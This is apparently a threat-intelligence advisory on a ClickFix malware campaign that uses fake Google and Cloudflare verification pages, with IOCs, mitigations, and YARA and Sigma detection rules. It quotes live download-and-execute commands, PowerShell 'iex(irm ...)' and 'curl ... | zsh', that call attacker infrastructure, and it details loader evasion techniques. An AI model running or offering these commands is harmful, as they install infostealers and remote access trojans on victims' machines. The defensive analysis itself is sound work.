1. Executive summary
An active, evolving ClickFix campaign uses fake Google and Cloudflare verification pages to socially engineer users into executing malicious PowerShell commands, resulting in the deployment of multiple malware families including StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, and a Rust-based stealer. The campaigns, active since at least late 2025, share common infrastructure including Cloudflare R2 buckets for payload distribution and IPs hosted on ASN Dedik Services Limited. EMEA financial services organisations face a direct risk from infostealers exfiltrating credentials and session tokens, as well as remote access trojans enabling follow-on intrusion, particularly against staff working via browser-based workflows who may be tricked by fake verification or "fix audio" lures.
2. Regulatory framing
| Article | Trigger (the fact in this item) | Practical impact |
|---|---|---|
| DORA Art. 17: ICT-related incident management process | ClickFix pages deliver infostealers (StealC, Remus, Amatera) and RATs (NetSupport) to user endpoints, constituting an ICT-related incident if a device is compromised. | Firms must have processes to detect, contain, and remediate endpoint infections resulting from social-engineering-driven malware execution. |
| DORA Art. 18: classification of ICT-related incidents and cyber threats | Multiple malware families with distinct capabilities (credential theft, remote access, loader frameworks) are delivered through shared infrastructure. | Incidents must be classified by severity — credential theft on a privileged user endpoint warrants a higher classification than a standalone loader execution. |
| NIS2 Art. 21(2)(d): supply chain security measures | The campaign abuses Cloudflare Pages (.pages.dev) and Cloudflare R2 buckets for distribution, and compromises legitimate websites for use as lures. | Supply-chain and third-party-hosting risk controls should account for abuse of legitimate CDN infrastructure for malware delivery. |
3. Technical analysis & attack chain
Attack chain (confirmed steps)
- User visits a fake verification page. Lures impersonate Google reCAPTCHA, Google Meet (audio fix), Cloudflare verification, or a "My QR Generator" service. Pages are hosted on repurchased expired domains,
.pages.devsubdomains, compromised websites, or purpose-built fake services. - Page copies a malicious PowerShell command to the clipboard. The command follows the pattern:
powershell -c "iex(irm '{IP}:{Port}/{Random Path}' -UseBasicParsing)"Observed ports: 6600, 9900, 5506, 7895, 7493, 149, 8442. In some cases the command is base64-encoded. The Google reCAPTCHA lure implements clipboard injection via aCustomCaptchaclass with the command in cleartext. The Cloudflare Pages lure uses XOR-obfuscated JavaScript with functions namedGatewayRuntime,RemoteVault,BeaconDispatcher,Clipboard,TokenController, andPanelController; the deobfuscated code is labelled "SECURITY GATEWAY." - User pastes and executes the command. The script decodes and drops a file to
%TEMP%\tmp{4 char}.tmp.ps1. - Staging to
C:\ProgramData\Zooms. The script extracts later-stage payloads toC:\ProgramData\Zooms. In some variants, the next stage is downloaded directly fromhttp://{IP}/dl-callback. - Payload delivery. Payloads are distributed via Cloudflare R2 buckets or direct IP addresses. Final payloads are often delivered via DLL hijacking.
Payload inventory
| File distributed | Malware |
|---|---|
libEGL.zip, Safe-1.zip |
Trojanized Electron app, ResiLoader and StealC |
Test.msi |
Deno Loader and PowerShell Stealer |
arworks.zip |
Amatera Stealer |
water-night.zip |
Remus Stealer |
Setup.msi, Invintrum_first.msi |
NetSupport |
traffic1.msi |
CastleLoader |
ibrowser.exe |
Rust Stealer |
ResiLoader / StealC chain (detailed)
libEGL.zipis downloaded frompub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zipand extracted toC:\ProgramData\Zooms\libEGL.zip_ext.- The ZIP contains a trojanized version of the open-source Franz messaging app. Malicious code is in
index.js. - The downloader reads
readme.txt, expects a campaign key of formatAAAA-BBBB, returns it as an array of tokens. The nameresiloader-1is present, giving the loader its name. - Checks
%APPDATA%\setup.txt; if absent, generates a random 8-char string and persists it. Callsapp.setLoginItemSettingsfor persistence. - Contacts
https[:]//completstep[.]com/api/and parses the JSON response. - If
task.eis present, executeseval(task.e)— enabling arbitrary JavaScript execution. - If
task.filesis present, creates%TEMP%\<Date.now()>\, decodes and writes each file. If any filename ends in.exe, runs it viachild_process.exec. Observed task:json {"task":{"name":"JUNE18USY","files":{ "msys-2.0.dll":"<base64>", "msys-crypto-3.dll":"<base64>", "msys-gcc_s-seh-1.dll":"<base64>", "ssh-add.exe":"<base64>" }}} - Execution:
C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{user}\AppData\Local\Temp\1782122017599\ssh-add.exe"" msys-crypto-3.dllis an obfuscated .NET NativeAOT loader implementing AV/EDR evasion via a BYOD technique, persistence, and ultimately loads StealC.
ResiLoader internal functionality
Decrypted strings reveal the following modules:
- MANPO — module loading (
ReadModule len=...,magicOffset=...) - PERS — persistence via RUN Registry Key:
cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe; copies itself toC:\ProgramData\Google Update - RUNPE — process hollowing (
CreateProcess,PEB patched,VirtualAllocEx) - POST —
RunForeverloop (POST: entering RunForever,POST: hollow=)
Additional capabilities:
- Decodes and decrypts driver
pcdhost.sys - Uses OPSWAT ICMLuaUtil Elevated COM Interface for privilege escalation
- Performs process hollowing of
ServiceModelReg.exeto execute StealC
Google Meet lure (recent)
Endpoint /api/driver-clipboard.php returns:
{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c \"iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\""}
Infrastructure notes
- ASN: Dedik Services Limited (payload distribution IPs)
- Cloudflare R2 buckets: Multiple
pub-*.r2[.]devdomains used for payload hosting - HTML fingerprint: Some responses contain only the string
"hehe" - URL parameters observed on lure pages:
zoneid,cost,device,country,clickid - Lure page paths observed:
/conf/captcha.html?zoneid=10420852,/wincapbot/nobot.html,/xmr/trkuste.php?zone=5327134,bless.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=US&device=desktop - IClickFix framework: In some cases the PowerShell command was distributed through this framework
Confidence caveat
This advisory is single-sourced (Malwarebytes threat-intel report). No independent corroboration was available at time of writing. No MITRE ATT&CK actor profile was resolved for the threat actor(s) behind this campaign — attribution is unconfirmed. No CISA-KEV entry, CVSS score, or CVE is associated with this item; this is a social-engineering-driven malware distribution campaign, not a vulnerability exploitation. Verify IOCs before enforcement.
4. Mitigation & containment
P1 — Within 24 hours
- Block all listed domains and IPs at web proxy, DNS sinkhole, and firewall. Prioritise the C2 and payload distribution domains: -
completstep[.]com,eventlogerps1[.]ink,be231ro963[.]com,popularcard[.]shop,xzz[.]proxygrid[.]cc,unitedstateverif[.]com,bigflaredefence[.]com,generator-qrcode[.]online,regdev-google[.]com,dropboxi[.]com,khosla[.]capital,eorgke09054909j[.]com- All listed*.pages.devsubdomains - All listed distribution domains (onegeekworld, thefirmos, antibotv3, etc.) - All listed IPs (151.240.151.126, 85.239.149.16, 85.239.149.40, 93.152.224.29, 151.240.151.46, 93.152.224.167, 85.239.149.78, 192.69.195.131, 135.181.171.40, 94.26.83.206, 91.92.34.128, 85.239.144.31, 93.152.224.39, 94.26.90.112, 146.19.248.120) - Block all listed Cloudflare R2 buckets at web proxy: -
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev-pub-620528e2dc874e16937673265aa23d39.r2[.]dev-pub-9682d5896df841679c5a17eb41273f89.r2[.]dev-pub-18d99d0d18b94e85824c1cc4d5b5c637.r2[.]dev-pub-0170eabb9df346bd822f863b7c3946e3.r2[.]dev - Deploy EDR blocking rules for the staging directory: Alert on any process writing to or executing from
C:\ProgramData\ZoomsorC:\ProgramData\Google Updatein the context of a user-initiated PowerShell session. - Alert on the PowerShell execution pattern:
powershell -c "iex(irm '*:*/*' -UseBasicParsing)"— particularly with the observed ports (6600, 9900, 5506, 7895, 7493, 149, 8442).
P2 — Within 72 hours
- Block the listed file hashes in EDR / endpoint protection: -
72907d0ca3258365838626f6a8d993a6(ResiLoader DLL) -0234E3188F2883A438B3F2BEAB7A78B2(StealC) -6a9ac6b3fff7b695dbd4df6ff7f6c516(Remus) -206ce339febca0c3bcc850f42595fc63(Amatera Stealer) -eee416efcb1e33f220cdb4b05496a07a(NetSupport RAT) -b8d53740024d126cb55f83854335a4ab(Rust Stealer) - Deploy EDR detection for DLL hijacking patterns: Alert on
ssh-add.exeloadingmsys-crypto-3.dllfrom a temp directory, and onServiceModelReg.exebeing spawned via process hollowing. - Deploy registry monitoring: Alert on RUN Registry Key entries pointing to
C:\ProgramData\Google Update\ssh-add.exe. - Hunt for
%APPDATA%\setup.txtas a potential ResiLoader persistence marker. - User awareness briefing: Warn staff that Google, Cloudflare, and Microsoft will never ask users to paste PowerShell commands to verify they are human or fix audio issues. Emphasise that Malwarebytes Browser Guard can warn on clipboard-write attempts from web pages.
P3 — Within 7 days
- Review web proxy logs for historical connections to any listed domains, IPs, and R2 buckets going back to late 2025.
- Hunt for
C:\ProgramData\Zoomsacross the estate — any endpoint with this directory should be treated as potentially compromised. - Hunt for Franz messaging app installations, particularly in temp directories or
C:\ProgramData\Zooms\libEGL.zip_ext. - Review EDR telemetry for
pcdhost.sysdriver installation and ICMLuaUtil COM interface abuse (privilege escalation indicator). - Update endpoint security to block the listed file names:
libEGL.zip,Safe-1.zip,Test.msi,arworks.zip,water-night.zip,Setup.msi,Invintrum_first.msi,traffic1.msi,ibrowser.exe.
5. Indicators of compromise
| Type | Value | Confidence | Source |
|---|---|---|---|
| md5 | 72907d0ca3258365838626f6a8d993a6 | High | Malwarebytes |
| md5 | 0234E3188F2883A438B3F2BEAB7A78B2 | High | Malwarebytes |
| md5 | 6a9ac6b3fff7b695dbd4df6ff7f6c516 | High | Malwarebytes |
| md5 | 206ce339febca0c3bcc850f42595fc63 | High | Malwarebytes |
| md5 | eee416efcb1e33f220cdb4b05496a07a | High | Malwarebytes |
| md5 | b8d53740024d126cb55f83854335a4ab | High | Malwarebytes |
| domain | onegeekworld[.]com | High | Malwarebytes |
| domain | thefirmos[.]com | High | Malwarebytes |
| domain | antibotv3[.]com | High | Malwarebytes |
| domain | centralwildcats[.]com | High | Malwarebytes |
| domain | cloud.antibotv3[.]com | High | Malwarebytes |
| domain | cloudautosolutions[.]com | High | Malwarebytes |
| domain | sunseekersupply[.]com | High | Malwarebytes |
| domain | 123clocks[.]com | High | Malwarebytes |
| domain | orcanegames[.]com | High | Malwarebytes |
| domain | rwmonitoring[.]com | High | Malwarebytes |
| domain | 100furniture[.]com | High | Malwarebytes |
| domain | nepalcharchaa[.]com | High | Malwarebytes |
| domain | p-floribunds.pages[.]dev | High | Malwarebytes |
| domain | pg-altirade2.pages[.]dev | High | Malwarebytes |
| domain | pg-cordivant-m6.pages[.]dev | High | Malwarebytes |
| domain | g-luminence.pages[.]dev | High | Malwarebytes |
| domain | generator-qrcode[.]online | High | Malwarebytes |
| domain | regdev-google[.]com | High | Malwarebytes |
| domain | khosla[.]capital | High | Malwarebytes |
| domain | eorgke09054909j[.]com | High | Malwarebytes |
| domain | dropboxi[.]com | High | Malwarebytes |
| domain | pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev | High | Malwarebytes |
| domain | pub-620528e2dc874e16937673265aa23d39.r2[.]dev | High | Malwarebytes |
| domain | pub-9682d5896df841679c5a17eb41273f89.r2[.]dev | High | Malwarebytes |
| domain | pub-18d99d0d18b94e85824c1cc4d5b5c637.r2[.]dev | High | Malwarebytes |
| domain | pub-0170eabb9df346bd822f863b7c3946e3.r2[.]dev | High | Malwarebytes |
| domain | unitedstateverif[.]com | High | Malwarebytes |
| domain | bigflaredefence[.]com | High | Malwarebytes |
| domain | popularcard[.]shop | High | Malwarebytes |
| domain | xzz[.]proxygrid[.]cc | High | Malwarebytes |
| domain | completstep[.]com | High | Malwarebytes |
| domain | eventlogerps1[.]ink | High | Malwarebytes |
| domain | be231ro963[.]com | High | Malwarebytes |
| ipv4 | 151.240.151.126 | High | Malwarebytes |
| ipv4 | 85.239.149.16 | High | Malwarebytes |
| ipv4 | 85.239.149.40 | High | Malwarebytes |
| ipv4 | 93.152.224.29 | High | Malwarebytes |
| ipv4 | 151.240.151.46 | High | Malwarebytes |
| ipv4 | 93.152.224.167 | High | Malwarebytes |
| ipv4 | 85.239.149.78 | High | Malwarebytes |
| ipv4 | 192.69.195.131 | High | Malwarebytes |
| ipv4 | 135.181.171.40 | High | Malwarebytes |
| ipv4 | 94.26.83.206 | High | Malwarebytes |
| ipv4 | 91.92.34.128 | High | Malwarebytes |
| ipv4 | 85.239.144.31 | High | Malwarebytes |
| ipv4 | 93.152.224.39 | High | Malwarebytes |
| ipv4 | 94.26.90.112 | High | Malwarebytes |
| ipv4 | 146.19.248.120 | High | Malwarebytes |
md5 72907d0ca3258365838626f6a8d993a6
md5 0234E3188F2883A438B3F2BEAB7A78B2
md5 6a9ac6b3fff7b695dbd4df6ff7f6c516
md5 206ce339febca0c3bcc850f42595fc63
md5 eee416efcb1e33f220cdb4b05496a07a
md5 b8d53740024d126cb55f83854335a4ab
domain onegeekworld.com
domain thefirmos.com
domain antibotv3.com
domain centralwildcats.com
domain cloud.antibotv3.com
domain cloudautosolutions.com
domain sunseekersupply.com
domain 123clocks.com
domain orcanegames.com
domain rwmonitoring.com
domain 100furniture.com
domain nepalcharchaa.com
domain p-floribunds.pages.dev
domain pg-altirade2.pages.dev
domain pg-cordivant-m6.pages.dev
domain g-luminence.pages.dev
domain generator-qrcode.online
domain regdev-google.com
domain khosla.capital
domain eorgke09054909j.com
domain dropboxi.com
domain pub-4ed7b8ecee744dea930d74ba4ac74285.r2.dev
domain pub-620528e2dc874e16937673265aa23d39.r2.dev
domain pub-9682d5896df841679c5a17eb41273f89.r2.dev
domain pub-18d99d0d18b94e85824c1cc4d5b5c637.r2.dev
domain pub-0170eabb9df346bd822f863b7c3946e3.r2.dev
domain unitedstateverif.com
domain bigflaredefence.com
domain popularcard.shop
domain xzz.proxygrid.cc
domain completstep.com
domain eventlogerps1.ink
domain be231ro963.com
ipv4 151.240.151.126
ipv4 85.239.149.16
ipv4 85.239.149.40
ipv4 93.152.224.29
ipv4 151.240.151.46
ipv4 93.152.224.167
ipv4 85.239.149.78
ipv4 192.69.195.131
ipv4 135.181.171.40
ipv4 94.26.83.206
ipv4 91.92.34.128
ipv4 85.239.144.31
ipv4 93.152.224.39
ipv4 94.26.90.112
ipv4 146.19.248.120
6. Detection
YARA rule
rule ClickFix_ResiLoader_StealC_Campaign {
meta {
author = "Adverse Trace"
date = "2026-07-02"
reference = "https://www.malwarebytes.com/blog/threat-intel/2026/07/fake-google-and-cloudflare-verification-pages-spread-multiple-malware-families"
description = "Detects ResiLoader DLL, ClickFix staging artefacts, and associated malware families"
}
strings:
$manpo1 = "MANPO: ReadModule len=" ascii
$manpo2 = "MANPO: magicOffset=" ascii
$pers1 = "PERS: FAIL all file copies failed, skipping run key" ascii
$pers2 = "PERS: FAIL both HKLM and HKCU Run key writes failed" ascii
$runpe1 = "RUNPE: CreateProcess failed" ascii
$runpe2 = "RUNPE: PEB patched" ascii
$runpe3 = "RUNPE: VirtualAllocEx failed" ascii
$post1 = "POST: RunForever exited (unexpected)" ascii
$post2 = "POST: entering RunForever" ascii
$post3 = "POST: hollow=" ascii
$resiloader = "resiloader-1" ascii
$hehe = "hehe" ascii
$sec_gateway = "SECURITY GATEWAY" ascii
$gateway_runtime = "GatewayRuntime" ascii
$remote_vault = "RemoteVault" ascii
$beacon_dispatcher = "BeaconDispatcher" ascii
$token_controller = "TokenController" ascii
$panel_controller = "PanelController" ascii
$custom_captcha = "CustomCaptcha" ascii
$pcdhost = "pcdhost.sys" ascii
$zooms_path = "C:\\ProgramData\\Zooms" ascii
$google_update_path = "C:\\ProgramData\\Google Update" ascii
$setup_txt = "setup.txt" ascii
$ssh_add = "ssh-add.exe" ascii
$service_model_reg = "ServiceModelReg.exe" ascii
$msys_crypto = "msys-crypto-3.dll" ascii
$fran = "Franz" ascii
$completstep = "completstep" ascii
$icmluautil = "ICMLuaUtil" ascii
condition:
5 of them
}
Sigma rule
title: ClickFix Campaign - PowerShell IEX IRM Execution Pattern
id: 7a3c2f1e-9b4d-4e8a-8f2c-1d6e5a7b9c0f
status: experimental
description: Detects the ClickFix PowerShell execution pattern used to download and execute malware from attacker-controlled IPs
author: Adverse Trace
date: 2026/07/02
references:
- https://www.malwarebytes.com/blog/threat-intel/2026/07/fake-google-and-cloudflare-verification-pages-spread-multiple-malware-families
logsource:
product: windows
category: process_creation
detection:
selection_psh_pattern:
CommandLine|contains|all:
- "powershell"
- "iex"
- "irm"
- "-UseBasicParsing"
filter_legitimate:
CommandLine|contains:
- "windows.net"
- "microsoft.com"
- "office365.com"
condition: selection_psh_pattern and not filter_legitimate
falsepositives:
- Legitimate administrative scripts using irm with iex (rare)
level: high
title: ClickFix Campaign - Staging Directory Creation in ProgramData Zooms
id: 8b4d3f2e-0c5e-4f9b-9a3d-2e7f6b8c0d1a
status: experimental
description: Detects file creation in C:\ProgramData\Zooms, the staging directory used by ClickFix campaigns
author: Adverse Trace
date: 2026/07/02
references:
- https://www.malwarebytes.com/blog/threat-intel/2026/07/fake-google-and-cloudflare-verification-pages-spread-multiple-malware-families
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|startswith: "C:\\ProgramData\\Zooms\\"
condition: selection
falsepositives:
- Unlikely in enterprise environments
level: high
title: ClickFix Campaign - ResiLoader Persistence via Google Update Run Key
id: 9c5e4f3f-1d6f-4f0c-0b4e-3f8a7c9d1e2b
status: experimental
description: Detects RUN Registry Key persistence pointing to C:\ProgramData\Google Update\ssh-add.exe used by ResiLoader
author: Adverse Trace
date: 2026/07/02
references:
- https://www.malwarebytes.com/blog/threat-intel/2026/07/fake-google-and-cloudflare-verification-pages-spread-multiple-malware-families
logsource:
product: windows
category: registry_event
detection:
selection:
TargetObject|contains:
- "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
- "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
Details|contains: "C:\\ProgramData\\Google Update\\ssh-add.exe"
condition: selection
falsepositives:
- None expected
level: critical
title: ClickFix Campaign - DLL Hijacking via ssh-add.exe from Temp
id: 0d6f5f4f-2e7f-4f1d-1c5f-4f9b8d0e2f3a
status: experimental
description: Detects ssh-add.exe executing from a Temp directory with msys-crypto-3.dll loaded, indicative of ResiLoader DLL hijacking
author: Adverse Trace
date: 2026/07/02
references:
- https://www.malwarebytes.com/blog/threat-intel/2026/07/fake-google-and-cloudflare-verification-pages-spread-multiple-malware-families
logsource:
product: windows
category: image_load
detection:
selection_process:
Image|contains:
- "\\Temp\\"
Image|endswith: "ssh-add.exe"
selection_dll:
ImageLoaded|endswith: "msys-crypto-3.dll"
condition: selection_process and selection_dll
falsepositives:
- Legitimate MSYS2 ssh-add.exe execution (would not run from Temp)
level: high
7. Sources
- Malwarebytes, "Fake Google and Cloudflare verification pages spread multiple malware families," https://www.malwarebytes.com/blog/threat-intel/2026/07/fake-google-and-cloudflare-verification-pages-spread-multiple-malware-families, 2026-07-02T16:05:08+00:00
8. Adverse Trace position
This is a high-impact social-engineering campaign with no associated CVE or CVSS score — the risk lies in the human-executed initial access vector, not a software vulnerability. The campaign delivers multiple mature infostealer and RAT families through shared infrastructure, and the ResiLoader chain demonstrates capable AV/EDR evasion (BYOD, .NET NativeAOT, process hollowing, driver-based privilege escalation). For EMEA financial services, the primary risk is credential and session-token theft from staff who encounter fake verification pages while browsing — particularly on unmanaged or BYO devices. We assess this as * because the attack requires user interaction (copy-paste-execute) and is not a wormable or remotely exploitable vulnerability, but the IOCs are high-confidence and the infrastructure is active. *This advisory is single-sourced (Malwarebytes); we will update if independent corroboration emerges. Attribution is unconfirmed — no MITRE actor profile was resolved. We are pushing the IOC list and YARA/Sigma rules to client EDR and SIEM platforms and will issue a follow-up if the infrastructure goes dormant.
Published via PulseTrace — Adverse Trace threat intelligence.